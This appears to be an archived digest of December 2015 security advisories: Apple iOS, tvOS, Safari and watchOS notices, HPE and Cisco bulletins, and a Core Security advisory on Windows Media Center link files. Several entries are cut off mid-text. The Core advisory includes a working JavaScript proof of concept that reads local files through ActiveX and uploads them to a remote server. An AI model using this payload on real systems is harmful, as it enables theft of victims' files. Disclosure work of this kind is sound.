CMT website: http://creativemobiletech.com/
List of white branded apps: 
https://play.google.com/store/search?q=com.apcurium.MK=apps=en
TaxiHail website: 
http://www.mobile-knowledge.com/products/passenger-solutions/taxihail/

Credits
Thank you to Garret Wasserman of CERT/CC for helping to communicate with the 
vendors.

Timeline
2015-10-14: Arro notified
2015-10-14: Initial vendor response
2015-10-15: Followup communications to Arro, no response
2015-10-20: CERT/CC notified
2015-10-23: CERT/CC response
2015-11-06: Mobile Knowledge acknowledged the problem via CERT/CC
2015-11-30: Fix deployed by vendor
2015-12-01: Fix confirmed
2015-12-08: Public disclosure, coordinated with CERT/CC

Version Information
Version 3
Last updated on 2015-12-07



APPLE-SA-2015-12-08-1 iOS 9.2

2015-12-10 Thread Apple Product Security


APPLE-SA-2015-12-08-1 iOS 9.2

iOS 9.2 is now available and addresses the following:

AppleMobileFileIntegrity
Available for:  iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact:  A malicious application may be able to execute arbitrary
code with system privileges
Description:  An access control issue was addressed by preventing
modification of access control structures.
CVE-ID
CVE-2015-7055 : Apple

AppSandbox
Available for:  iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact:  A malicious application may maintain access to Contacts
after having access revoked
Description:  An issue existed in the sandbox's handling of hard
links. This issue was addressed through improved hardening of the app
sandbox.
CVE-ID
CVE-2015-7001 : Razvan Deaconescu and Mihai Bucicoiu of University
POLITEHNICA of Bucharest; Luke Deshotels and William Enck of North
Carolina State University; Lucas Vincenzo Davi and Ahmad-Reza Sadeghi
of TU Darmstadt

CFNetwork HTTPProtocol
Available for:  iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact:  An attacker with a privileged network position may be able
to bypass HSTS
Description:  An input validation issue existed within URL
processing. This issue was addressed through improved URL validation.
CVE-ID
CVE-2015-7094 : Tsubasa Iinuma (@llamakko_cafe) of Gehirn Inc. and
Muneaki Nishimura (nishimunea)

Compression
Available for:  iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact:  Visiting a maliciously crafted website may lead to arbitrary
code execution
Description:  An uninitialized memory access issue existed in zlib.
This issue was addressed through improved memory initialization and
additional validation of zlib streams.
CVE-ID
CVE-2015-7054 : j00ru

CoreGraphics
Available for:  iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact:  Processing a maliciously crafted font file may lead to
arbitrary code execution
Description:  A memory corruption issue existed in the processing of
font files. This issue was addressed through improved input
validation.
CVE-ID
CVE-2015-7105 : John Villamil (@day6reak), Yahoo Pentest Team

CoreMedia Playback
Available for:  iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact:  Visiting a maliciously crafted website may lead to arbitrary
code execution
Description:  Multiple memory corruption issues existed in the
processing of malformed media files. These issues were addressed
through improved memory handling.
CVE-ID
CVE-2015-7074 : Apple
CVE-2015-7075

dyld
Available for:  iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact:  A malicious application may be able to execute arbitrary
code with system privileges
Description:  Multiple segment validation issues existed in dyld.
These were addressed through improved environment sanitization.
CVE-ID
CVE-2015-7072 : Apple
CVE-2015-7079 : PanguTeam

GPUTools Framework
Available for:  iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact:  A malicious application may be able to execute arbitrary
code with system privileges
Description:  Multiple path validation issues existed in Mobile
Replayer. These were addressed through improved environment
sanitization.
CVE-ID
CVE-2015-7069 : Luca Todesco (@qwertyoruiop)
CVE-2015-7070 : Luca Todesco (@qwertyoruiop)

iBooks
Available for:  iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact:  Parsing a maliciously crafted iBooks file may lead to
disclosure of user information
Description:  An XML external entity reference issue existed with
iBook parsing. This issue was addressed through improved parsing.
CVE-ID
CVE-2015-7081 : Behrouz Sadeghipour (@Nahamsec) and Patrik Fehrenbach
(@ITSecurityguard)

ImageIO
Available for:  iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact:  Processing a maliciously crafted image may lead to arbitrary
code execution
Description:  A memory corruption issue existed in ImageIO. This
issue was addressed through improved memory handling.
CVE-ID
CVE-2015-7053 : Apple

IOHIDFamily
Available for:  iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact:  A malicious application may be able to execute arbitrary
code with system privileges
Description:  Multiple memory corruption issues existed in
IOHIDFamily API. These issues were addressed through improved memory
handling.
CVE-ID
CVE-2015-7111 : beist and ABH of BoB
CVE-2015-7112 : Ian Beer of Google Project Zero

IOKit SCSI
Available for:  iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact:  A malicious application may be able to execute arbitrary
code with kernel privileges
Description:  A null pointer dereference existed in the handling of a
certain userclient type. 

[CORE-2015-0014] - Microsoft Windows Media Center link file incorrectly resolved reference

2015-12-10 Thread CORE Advisories Team
1. Advisory Information

Title: Microsoft Windows Media Center link file incorrectly resolved reference
Advisory ID: CORE-2015-0014
Advisory URL: http://www.coresecurity.com/advisories/microsoft-windows-media-center-link-file-incorrectly-resolved-reference
Date published: 2015-12-08
Date of last update: 2015-12-04
Vendors contacted: Microsoft
Release mode: Coordinated release

2. Vulnerability Information

Class: Use of Incorrectly-Resolved Name or Reference [CWE-706]
Impact: Information leak
Remotely Exploitable: No
Locally Exploitable: Yes
CVE Name: CVE-2015-6127

 

3. Vulnerability Description

The 'application' tag in Microsoft [1] Windows Media Center link files (.mcl 
extension) can include a 'run' parameter, which indicates the path of a file to 
be launched when opening the MCL file, or a 'url' parameter, which indicates 
the URL of a web page to be loaded within the Media Center's embedded web 
browser.

A specially crafted MCL file having said 'url' parameter pointing to the MCL 
file itself can trick Windows Media Center into rendering the very same MCL 
file as a local HTML file within the Media Center's embedded web browser.

4. Vulnerable Packages

Windows 7 for x64-based Systems Service Pack 1 (with Internet Explorer 11 
installed)
Other versions are probably affected too, but they were not checked.

5. Vendor Information, Solutions and Workarounds

Microsoft posted the following Security Bulletin: MS15-134 [2]

6. Credits

This vulnerability was discovered and researched by Francisco Falcon from Core 
Exploits Team. The publication of this advisory was coordinated by Joaquín 
Rodríguez Varela from the Core Advisories Team.

 

7. Technical Description / Proof of Concept Code

The ehexthost.exe binary, part of Windows Media Center, loads the given URL 
into an embedded instance of Internet Explorer running in the Local Machine 
zone, but it does not opt in to the FEATURE_LOCALMACHINE_LOCKDOWN IE security 
feature. An attacker can therefore leverage this situation to read and 
exfiltrate arbitrary files from a victim's local filesystem by convincing the 
victim to open a malicious MCL file.

The proof of concept shows an MCL file with embedded HTML and JS code that 
references itself in the 'url' parameter. Unlike what happens when a local 
HTML file is loaded into Internet Explorer 11, the JS code included here runs 
automatically with no prompts and is able to read arbitrary local files using 
the MSXML2.XMLHTTP ActiveX object. The files read can then be uploaded to an 
arbitrary remote web server.

Also note that, in order for the PoC to work, the value of the 'url' parameter 
must match the name of the MCL file.
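As an added defender-side example (not part of the Core Security advisory or its PoC), the following triage check flags an .mcl file whose 'url' parameter points back at an .mcl file, or that carries embedded script, which is the self-referencing pattern described above. It assumes the MCL file is XML with an application root element whose 'url' and 'run' parameters are attributes; the sample files are constructed.

```python
"""Added example: triage a Windows Media Center link (.mcl) file for the
self-referencing 'url' pattern described in the advisory (CVE-2015-6127).
Assumption: the file is XML with an <application> root element whose 'url'
and 'run' parameters are attributes. Sample files below are constructed."""
import re
import xml.etree.ElementTree as ET
from dataclasses import dataclass, field
from typing import List, Tuple

# Markers of active content embedded in what should be a plain link file.
ACTIVE_CONTENT = [
    re.compile(r"<script\b", re.IGNORECASE),
    re.compile(r"ActiveXObject\s*\(", re.IGNORECASE),
]


@dataclass
class MclFinding:
    filename: str
    url: str
    run: str
    reasons: List[str] = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        return bool(self.reasons)


def _basename(path: str) -> str:
    """Last path component, tolerating both '/' and '\\' separators."""
    return re.split(r"[\\/]", path)[-1]


def _application_attrs(text: str) -> Tuple[str, str]:
    """Return the (url, run) attributes of the <application> element.
    A well-formed link file parses as XML; a file with HTML appended after
    the root element (the shape the advisory describes) does not, so fall
    back to reading the attributes of the first <application ...> tag."""
    try:
        root = ET.fromstring(text)
        if root.tag.lower() == "application":
            return root.get("url", ""), root.get("run", "")
    except ET.ParseError:
        pass
    m = re.search(r"<application\b([^>]*)>", text, re.IGNORECASE | re.DOTALL)
    if not m:
        return "", ""
    pairs = re.findall(r'(\w+)\s*=\s*"([^"]*)"', m.group(1))
    attrs = {k.lower(): v for k, v in pairs}
    return attrs.get("url", ""), attrs.get("run", "")


def triage_mcl(filename: str, text: str) -> MclFinding:
    """Flag url values that make Media Center render a local .mcl file as
    HTML, and any script embedded alongside the link."""
    url, run = _application_attrs(text)
    finding = MclFinding(filename, url, run)
    target = url.strip().lower()
    if target.endswith(".mcl"):
        finding.reasons.append("url points at an .mcl file")
        if _basename(target) == _basename(filename).lower():
            finding.reasons.append("url references the link file itself")
    elif target.startswith("file:"):
        finding.reasons.append("url loads a local file")
    for pat in ACTIVE_CONTENT:
        if pat.search(text):
            finding.reasons.append("embedded active content matches " + pat.pattern)
    return finding


# Constructed samples: a plain link file, and one shaped like the advisory's
# self-referencing PoC (the script body is only a marker).
BENIGN_MCL = '<application title="Weather" url="http://example.invalid/mce/" />'
SELF_REF_MCL = (
    '<application title="poc" url="poc-microsoft.mcl" />\n'
    '<html><body><script>alert("constructed marker");</script></body></html>\n'
)

if __name__ == "__main__":
    for name, text in (("weather.mcl", BENIGN_MCL), ("poc-microsoft.mcl", SELF_REF_MCL)):
        f = triage_mcl(name, text)
        print(name, "SUSPICIOUS" if f.suspicious else "clean", f.reasons)
```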

7.1. Proof of Concept

A new file should be created with the name "poc-microsoft.mcl" and with the 
following content:

function do_upload(fname, data){
    /* POSTs the bytes read below to the attacker's collection server */
    var xmlhttp = new XMLHttpRequest();
    xmlhttp.open("POST", "http://192.168.1.50/uploadfile.php", true);
    xmlhttp.setRequestHeader("Content-type", "multipart/form-data");
    xmlhttp.setRequestHeader("Connection", "close");
    xmlhttp.onreadystatechange = function(){if (xmlhttp.readyState == 4){alert(fname + " done.");}}
    xmlhttp.send(new Uint8Array(data));
}

function read_local_file(filename){
    /* Must use this one, XMLHttpRequest() doesn't allow to read local files */
    var xmlhttp = new ActiveXObject("MSXML2.XMLHTTP");
    xmlhttp.open("GET", filename, false);
    xmlhttp.send();
    return xmlhttp.responseBody.toArray();
}

function upload_file(filename){
    try{
        do_upload(filename, read_local_file(filename));
    }catch(e){
        alert(filename + " error: " + e);
    }
}

upload_file("file:///C:/Windows/System32/calc.exe");


8. Report Timeline

2015-09-24: Core Security sent the first notification to Microsoft.
2015-09-24: Microsoft acknowledged receipt of the email and requested a draft 
version of the advisory.
2015-09-25: Core Security sent Microsoft the draft version of the advisory 
including a PoC.
2015-09-25: Microsoft cased the report under MSRC 31305.
2015-10-02: Core Security requested Microsoft provide a status update and 
confirmation of the reported bug.
2015-10-02: Microsoft informed Core Security that they were able to reproduce 
the issue. They were still reviewing it to determine if they would address it 
in a security release.
2015-10-07: Core Security requested Microsoft let us know once they made a 
decision.
2015-10-08: Microsoft informed Core Security they would keep us updated.
2015-10-26: Core Security asked Microsoft if there were any updates regarding 
the reported bug and if they had an estimated time of availability.
2015-10-27: Microsoft informed Core Security that they would be pursuing a fix 
for the reported issue and are working on a release date for it.

APPLE-SA-2015-12-08-2 tvOS 9.1

2015-12-10 Thread Apple Product Security
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

APPLE-SA-2015-12-08-2 tvOS 9.1

tvOS 9.1 is now available and addresses the following:

AppleMobileFileIntegrity
Available for:  Apple TV (4th generation)
Impact:  A malicious application may be able to execute arbitrary
code with system privileges
Description:  An access control issue was addressed by preventing
modification of access control structures.
CVE-ID
CVE-2015-7055 : Apple

AppSandbox
Available for:  Apple TV (4th generation)
Impact:  A malicious application may maintain access to Contacts
after having access revoked
Description:  An issue existed in the sandbox's handling of hard
links. This issue was addressed through improved hardening of the app
sandbox.
CVE-ID
CVE-2015-7001 : Razvan Deaconescu and Mihai Bucicoiu of University
POLITEHNICA of Bucharest; Luke Deshotels and William Enck of North
Carolina State University; Lucas Vincenzo Davi and Ahmad-Reza Sadeghi
of TU Darmstadt

Compression
Available for:  Apple TV (4th generation)
Impact:  Visiting a maliciously crafted website may lead to arbitrary
code execution
Description:  An uninitialized memory access issue existed in zlib.
This issue was addressed through improved memory initialization and
additional validation of zlib streams.
CVE-ID
CVE-2015-7054 : j00ru

Configuration Profiles
Available for:  Apple TV (4th generation)
Impact:  A local attacker may be able to install a configuration
profile without admin privileges
Description:  An issue existed when installing configuration
profiles. This issue was addressed through improved authorization
checks.
CVE-ID
CVE-2015-7062 : David Mulder of Dell Software

CoreGraphics
Available for:  Apple TV (4th generation)
Impact:  Processing a maliciously crafted font file may lead to
arbitrary code execution
Description:  A memory corruption issue existed in the processing of
font files. This issue was addressed through improved input
validation.
CVE-ID
CVE-2015-7105 : John Villamil (@day6reak), Yahoo Pentest Team

CoreMedia Playback
Available for:  Apple TV (4th generation)
Impact:  Visiting a maliciously crafted website may lead to arbitrary
code execution
Description:  Multiple memory corruption issues existed in the
processing of malformed media files. These issues were addressed
through improved memory handling.
CVE-ID
CVE-2015-7074
CVE-2015-7075 : Apple

Disk Images
Available for:  Apple TV (4th generation)
Impact:  A local user may be able to execute arbitrary code with
kernel privileges
Description:  A memory corruption issue existed in the parsing of
disk images. This issue was addressed through improved memory
handling.
CVE-ID
CVE-2015-7110 : Ian Beer of Google Project Zero

dyld
Available for:  Apple TV (4th generation)
Impact:  A malicious application may be able to execute arbitrary
code with system privileges
Description:  Multiple segment validation issues existed in dyld.
These were addressed through improved environment sanitization.
CVE-ID
CVE-2015-7072 : Apple
CVE-2015-7079 : PanguTeam

ImageIO
Available for:  Apple TV (4th generation)
Impact:  Processing a maliciously crafted image may lead to arbitrary
code execution
Description:  A memory corruption issue existed in ImageIO. This
issue was addressed through improved memory handling.
CVE-ID
CVE-2015-7053 : Apple

IOAcceleratorFamily
Available for:  Apple TV (4th generation)
Impact:  A malicious application may be able to execute arbitrary
code with system privileges
Description:  A memory corruption issue existed in
IOAcceleratorFamily. This issue was addressed through improved memory
handling.
CVE-ID
CVE-2015-7109 : Juwei Lin of TrendMicro

IOHIDFamily
Available for:  Apple TV (4th generation)
Impact:  A malicious application may be able to execute arbitrary
code with system privileges
Description:  Multiple memory corruption issues existed in
IOHIDFamily API. These issues were addressed through improved memory
handling.
CVE-ID
CVE-2015-7111 : beist and ABH of BoB
CVE-2015-7112 : Ian Beer of Google Project Zero

IOKit SCSI
Available for:  Apple TV (4th generation)
Impact:  A malicious application may be able to execute arbitrary
code with kernel privileges
Description:  A null pointer dereference existed in the handling of a
certain userclient type. This issue was addressed through improved
validation.
CVE-ID
CVE-2015-7068 : Ian Beer of Google Project Zero

Kernel
Available for:  Apple TV (4th generation)
Impact:  A local application may be able to cause a denial of service
Description:  Multiple denial of service issues were addressed
through improved memory handling.
CVE-ID
CVE-2015-7040 : Lufeng Li of Qihoo 360 Vulcan Team
CVE-2015-7041 : Lufeng Li of Qihoo 360 Vulcan Team
CVE-2015-7042 : Lufeng Li of Qihoo 360 Vulcan Team
CVE-2015-7043 : Tarjei Mandt (@kernelpool)

Kernel
Available for:  Apple TV (4th generation)
Impact:  A local user may be able to execute arbitrary code with
kernel privileges
Description:  Multiple memory corruption issues existed in the
kernel. These 

[security bulletin] HPSBHF03432 rev.1 - HPE Networking Comware 5, Comware 5 Low Encryption SW, Comware 7, VCX Using NTP, Remote Access Restriction Bypass and Code Execution

2015-12-10 Thread security-alert
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Note: the current version of the following document is available here:
https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04916783

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c04916783
Version: 1

HPSBHF03432 rev.1 - HPE Networking Comware 5, Comware 5 Low Encryption SW,
Comware 7, VCX Using NTP, Remote Access Restriction Bypass and Code Execution

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release Date: 2015-12-09
Last Updated: 2015-12-09

Potential Security Impact: Remote Access Restriction Bypass, Code Execution

Source: Hewlett Packard Enterprise, Product Security Response Team

VULNERABILITY SUMMARY
Potential security vulnerabilities have been identified with HPE Networking
Comware 5, Comware 5 Low Encryption SW, Comware 7, and VCX using NTP. The
vulnerabilities could be remotely exploited, resulting in remote access
restriction bypass and code execution.

References:

SSRT101878
CVE-2014-9293
CVE-2014-9294
CVE-2014-9295

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.

See the RESOLUTION section for a list of impacted hardware and Comware 5,
Comware 5 Low Encryption SW, Comware 7, and VCX versions.

BACKGROUND

CVSS 2.0 Base Metrics
===
  Reference      Base Vector                    Base Score
  CVE-2014-9293  (AV:N/AC:L/Au:N/C:P/I:P/A:P)   7.5
  CVE-2014-9294  (AV:N/AC:L/Au:N/C:P/I:P/A:P)   7.5
  CVE-2014-9295  (AV:N/AC:L/Au:N/C:P/I:P/A:P)   7.5
===
Information on CVSS is documented in HP Customer Notice: HPSN-2008-002

RESOLUTION
Hewlett Packard Enterprise has provided updated Comware 5, Comware 5 Low
Encryption SW, Comware 7 and VCX to address this on impacted Hewlett Packard
Enterprise products. Each entry below gives the product family, the fixed
version, the HP branded and H3C branded products impacted, and the CVE number.

Family: 8800 (Comware 5)
Fixed Version: R3627P04
HP Branded Products Impacted: JC137A HP 8805/8808/8812 (2E) Main Control
Unit Module, JC138A HP 8805/8808/8812 (1E) Main Control Unit Module, JC141A
HP 8802 Main Control Unit Module, JC147A HP 8802 Router Chassis, JC147B HP
8802 Router Chassis, JC148A HP 8805 Router Chassis, JC148B HP 8805 Router
Chassis, JC149A HP 8808 Router Chassis, JC149B HP 8808 Router Chassis,
JC150A HP 8812 Router Chassis, JC150B HP 8812 Router Chassis, JC596A HP 8800
Dual Fabric Main Processing Unit, JC597A HP 8800 Single Fabric Main
Processing Unit
CVE #: CVE-2014-9295

Family: A6600 (Comware 5)
Fixed Version: R3303P18
HP Branded Products Impacted: JC165A HP 6600 RPE-X1 Router Module, JC177A
HP 6608 Router, JC177B HP 6608 Router Chassis, JC178A HP 6604 Router
Chassis, JC178B HP 6604 Router Chassis, JC496A HP 6616 Router Chassis,
JC566A HP 6600 RSE-X1 Router Main Processing Unit, JG780A HP 6600 RSE-X1
TAA-compliant Main Processing Unit, JG781A HP 6600 RPE-X1 TAA-compliant
Main Processing Unit
CVE #: CVE-2014-9295

Family: HSR6602 (Comware 5)
Fixed Version: R3303P18
HP Branded Products Impacted: JC176A HP 6602 Router Chassis, JG353A HP
HSR6602-G Router, JG354A HP HSR6602-XG Router, JG355A HP 6600 MCP-X1 Router
Main Processing Unit, JG356A HP 6600 MCP-X2 Router Main Processing Unit,
JG776A HP HSR6602-G TAA-compliant Router, JG777A HP HSR6602-XG
TAA-compliant Router, JG778A HP 6600 MCP-X2 Router TAA-compliant Main
Processing Unit
CVE #: CVE-2014-9295

Family: HSR6800 (Comware 5)
Fixed Version: R3303P18
HP Branded Products Impacted: JG361A HP HSR6802 Router Chassis, JG362A HP
HSR6804 Router Chassis, JG363A HP HSR6808 Router Chassis, JG364A HP HSR6800
RSE-X2 Router Main Processing Unit, JG779A HP HSR6800 RSE-X2 Router
TAA-compliant Main Processing Unit
CVE #: CVE-2014-9295

Family: MSR20 (Comware 5)
Fixed Version: R2513P45
HP Branded Products Impacted: JD432A HP A-MSR20-21 Router, JD662A HP
MSR20-20 Router, JD663A HP A-MSR20-21 Router, JD663B HP MSR20-21 Router,
JD664A HP MSR20-40 Router, JF228A HP MSR20-40 Router, JF283A HP MSR20-20
Router
CVE #: CVE-2014-9295

Family: MSR20-1X (Comware 5)
Fixed Version: R2513P45
HP Branded Products Impacted: JD431A HP MSR20-10 Router, JD667A HP MSR20-15
IW Multi-Service Router, JD668A HP MSR20-13 Multi-Service Router, JD669A HP
MSR20-13 W Multi-Service Router, JD670A HP MSR20-15 A Multi-Service Router,
JD671A HP MSR20-15 AW Multi-Service Router, JD672A HP MSR20-15 I
Multi-Service Router, JD673A HP MSR20-11 Multi-Service Router, JD674A HP
MSR20-12 Multi-Service Router, JD675A HP MSR20-12 W Multi-Service Router,
JD676A HP MSR20-12 T1 Multi-Service Router, JF236A HP MSR20-15-I Router,
JF237A HP MSR20-15-A Router, JF238A HP MSR20-15-I-W Router, JF239A HP
MSR20-11 Router, JF240A HP MSR20-13 Router, JF241A HP MSR20-12 Router,
JF806A HP MSR20-12-T Router, JF807A HP MSR20-12-W Router, JF808A HP
MSR20-13-W Router, JF809A HP MSR20-15-A-W Router, JF817A HP MSR20-15
Router, JG209A HP MSR20-12-T-W Router (NA), JG210A HP MSR20-13-W Router
(NA)
H3C Branded Products Impacted: H3C MSR 20-15 Router Host(AC) 1 FE 4 LSW 1,
H3C RT-MSR2015-AC-OVS-AW-H3 (0235A393), H3C RT-MSR2015-AC-OVS-I-H3
(0235A394), H3C RT-MSR2015-AC-OVS-IW-H3 (0235A38V), H3C MSR 20-11
(0235A31V), H3C MSR 20-12 (0235A32E), H3C MSR 20-12 T1 (0235A32B), 

APPLE-SA-2015-12-08-5 Safari 9.0.2

2015-12-10 Thread Apple Product Security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

APPLE-SA-2015-12-08-5 Safari 9.0.2

Safari 9.0.2 is now available and addresses the following:

WebKit
Available for:  OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,
OS X El Capitan v10.11 and v10.11.1
Impact:  Visiting a maliciously crafted website may lead to arbitrary
code execution
Description:  Multiple memory corruption issues existed in WebKit.
These issues were addressed through improved memory handling.
CVE-ID
CVE-2015-7048 : Apple
CVE-2015-7095 : Apple
CVE-2015-7096 : Apple
CVE-2015-7097 : Apple
CVE-2015-7098 : Apple
CVE-2015-7099 : Apple
CVE-2015-7100 : Apple
CVE-2015-7101 : Apple
CVE-2015-7102 : Apple
CVE-2015-7103 : Apple
CVE-2015-7104 : Apple

WebKit
Available for:  OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,
OS X El Capitan v10.11 and v10.11.1
Impact:  Visiting a maliciously crafted website may reveal a user's
browsing history
Description:  An insufficient input validation issue existed in
content blocking. This issue was addressed through improved content
extension parsing.
CVE-ID
CVE-2015-7050 : Luke Li and Jonathan Metzman

Installation note:

Safari 9.0.2 may be obtained from the Mac App Store.

Information will also be posted to the Apple Security Updates
web site: https://support.apple.com/kb/HT201222

This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/



[security bulletin] HPSBHF03433 SSRT102964 rev.1 - HP-UX Running Mozilla Firefox and Thunderbird, Remote Disclosure of Information

2015-12-10 Thread security-alert
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Note: the current version of the following document is available here:
https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04918839

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c04918839
Version: 1

HPSBHF03433 SSRT102964 rev.1 - HP-UX Running Mozilla Firefox and Thunderbird,
Remote Disclosure of Information

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release Date: 2015-12-09
Last Updated: 2015-12-09

Potential Security Impact: Remote Disclosure of Information

Source: Hewlett Packard Enterprise, Product Security Response Team

VULNERABILITY SUMMARY
A potential security vulnerability has been identified with HP-UX Running
Mozilla Firefox and Thunderbird. This may allow remote disclosure of
information.

Note: This is the TLS vulnerability using US export-grade 512-bit keys in
Diffie-Hellman key exchange known as "Logjam" which could be exploited
remotely resulting in disclosure of information.

References:

CVE-2015-4000
PSRT102964

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.

HP-UX Thunderbird v2.0.0.24
HP-UX Firefox browser v3.5.09.00

BACKGROUND

CVSS 2.0 Base Metrics
===
  Reference      Base Vector                    Base Score
  CVE-2015-4000  (AV:N/AC:M/Au:N/C:N/I:P/A:N)   4.3
===
Information on CVSS is documented in HP Customer Notice: HPSN-2008-002

RESOLUTION

HP has provided the following configuration instructions to resolve this
vulnerability.

Do the following to mitigate the logjam issue in HP-UX Firefox and
Thunderbird:

HP-UX Firefox browser:

Visit about:config in the Firefox browser. Search for ssl3 and disable the
DHE_EXPORT ciphers by setting the following preference values to false:
security.ssl3.dhe_rsa_aes_128_sha
security.ssl3.dhe_rsa_aes_256_sha
Restart the browser.

HP-UX Thunderbird:

Select "Preferences" from the "Edit" menu.
Select the "Advanced" tab and then click the "Config Editor" button. Search for
security.ssl3.dhe_rsa_aes and disable the DHE_EXPORT ciphers by setting the
following preference values to false:
security.ssl3.dhe_rsa_aes_128_sha
security.ssl3.dhe_rsa_aes_256_sha

HISTORY
Version:1 (rev.1) - 9 December 2015 Initial release

Third Party Security Patches: Third party security patches that are to be
installed on systems running Hewlett Packard Enterprise (HPE) software
products should be applied in accordance with the customer's patch management
policy.

Support: For issues about implementing the recommendations of this Security
Bulletin, contact normal HPE Services support channel. For other issues about
the content of this Security Bulletin, send e-mail to security-al...@hpe.com.

Report: To report a potential security vulnerability with any HPE supported
product, send Email to: security-al...@hpe.com

Subscribe: To initiate a subscription to receive future HPE Security Bulletin
alerts via Email: http://www.hpe.com/support/Subscriber_Choice

Security Bulletin Archive: A list of recently released Security Bulletins is
available here: http://www.hpe.com/support/Security_Bulletin_Archive

Software Product Category: The Software Product Category is represented in
the title by the two characters following HPSB.

3C = 3COM
3P = 3rd Party Software
GN = HPE General Software
HF = HPE Hardware and Firmware
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PV = ProCurve
ST = Storage Software
UX = HP-UX

Copyright 2015 Hewlett Packard Enterprise

Hewlett Packard Enterprise shall not be liable for technical or editorial
errors or omissions contained herein. The information provided is provided
"as is" without warranty of any kind. To the extent permitted by law, neither
HP or its affiliates, subcontractors or suppliers will be liable for
incidental,special or consequential damages including downtime cost; lost
profits; damages relating to the procurement of substitute products or
services; or damages for loss of data, or software restoration. The
information in this document is subject to change without notice. Hewlett
Packard Enterprise and the names of Hewlett Packard Enterprise products
referenced herein are trademarks of Hewlett Packard Enterprise in the United
States and other countries. Other product and company names mentioned herein
may be trademarks of their respective owners.



Cisco Security Advisory: Cisco Prime Collaboration Assurance Default Account Credential Vulnerability

2015-12-10 Thread Cisco Systems Product Security Incident Response Team
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

Cisco Security Advisory: Cisco Prime Collaboration Assurance Default Account 
Credential Vulnerability

Advisory ID: cisco-sa-20151209-pca

Revision 1.0

For Public Release  2015 December 9 16:00 UTC (GMT)

+--------------------------------------------------------------------

Summary
===

A vulnerability in Cisco Prime Collaboration Assurance (PCA) Software could 
allow an unauthenticated, remote attacker to log in to the system shell with 
the default cmuser user account and access the shell with a limited set of 
permissions.

The vulnerability is due to an undocumented account that has a default and 
static password. This account is created during installation and cannot be 
changed or deleted without impacting the functionality of the system. The first 
time this account is used the system will request that the user change the 
default password.

An attacker could exploit this vulnerability by remotely connecting to the 
affected system via SSH by using the undocumented account. Successful 
exploitation could allow the attacker to access the system with the privileges 
of the cmuser user. This vulnerability allows the attacker to: access some 
sensitive data, such as the password file, system logs, and Cisco PCA database 
information; modify some data; run some internal executables; and potentially 
make the system unstable or inaccessible.

Cisco has released software updates that address this vulnerability. 
Workarounds are available.

This advisory is available at the following link: 
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20151209-pca




APPLE-SA-2015-12-08-4 watchOS 2.1

2015-12-10 Thread Apple Product Security
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

APPLE-SA-2015-12-08-4 watchOS 2.1

watchOS 2.1 is now available and addresses the following:

AppSandbox
Available for:  Apple Watch Sport, Apple Watch, Apple Watch Edition,
and Apple Watch Hermes
Impact:  A malicious application may maintain access to Contacts
after having access revoked
Description:  An issue existed in the sandbox's handling of hard
links. This issue was addressed through improved hardening of the app
sandbox.
CVE-ID
CVE-2015-7001 : Razvan Deaconescu and Mihai Bucicoiu of University
POLITEHNICA of Bucharest; Luke Deshotels and William Enck of North
Carolina State University; Lucas Vincenzo Davi and Ahmad-Reza Sadeghi
of TU Darmstadt

Compression
Available for:  Apple Watch Sport, Apple Watch, Apple Watch Edition,
and Apple Watch Hermes
Impact:  Visiting a maliciously crafted website may lead to arbitrary
code execution
Description:  An uninitialized memory access issue existed in zlib.
This issue was addressed through improved memory initialization and
additional validation of zlib streams.
CVE-ID
CVE-2015-7054 : j00ru

CoreGraphics
Available for:  Apple Watch Sport, Apple Watch, Apple Watch Edition,
and Apple Watch Hermes
Impact:  Processing a maliciously crafted font file may lead to
arbitrary code execution
Description:  A memory corruption issue existed in the processing of
font files. This issue was addressed through improved input
validation.
CVE-ID
CVE-2015-7105 : John Villamil (@day6reak), Yahoo Pentest Team

CoreMedia Playback
Available for:  Apple Watch Sport, Apple Watch, Apple Watch Edition,
and Apple Watch Hermes
Impact:  Visiting a maliciously crafted website may lead to arbitrary
code execution
Description:  A memory corruption issue existed in the processing of
malformed media files. This issue was addressed through improved
memory handling.
CVE-ID
CVE-2015-7075

dyld
Available for:  Apple Watch Sport, Apple Watch, Apple Watch Edition,
and Apple Watch Hermes
Impact:  A malicious application may be able to execute arbitrary
code with system privileges
Description:  A segment validation issue existed in dyld. This was
addressed through improved environment sanitization.
CVE-ID
CVE-2015-7072 : Apple

FontParser
Available for:  Apple Watch Sport, Apple Watch, Apple Watch Edition,
and Apple Watch Hermes
Impact:  Processing a maliciously crafted font file may lead to
arbitrary code execution
Description:  Multiple memory corruption issues existed in the
processing of font files. These issues were addressed through
improved bounds checking.
CVE-ID
